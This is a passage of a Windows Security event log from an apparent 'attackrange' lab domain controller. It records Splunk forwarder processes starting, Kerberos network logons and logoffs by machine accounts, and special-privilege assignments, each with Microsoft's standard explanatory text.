Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265098
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265100
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265102
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265101
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265103
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1748
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265109
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD976
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265108
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD988
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265107
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD9AA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59BF5E39-EF3C-C4F1-62B6-4D331A885FBB}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54218
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265106
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD988
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54217
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265105
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD976
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54216
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265104
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD93F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54214
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265115
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDCB7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265114
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BDCB7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64981
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265113
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDCB7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265112
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDC4B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265111
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BDC4B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64980
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265110
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDC4B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:57:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265116
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD9AA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265119
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BE82B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265118
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BE82B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64987
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265117
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BE82B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:58:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265120
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265122
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1084
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265121
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
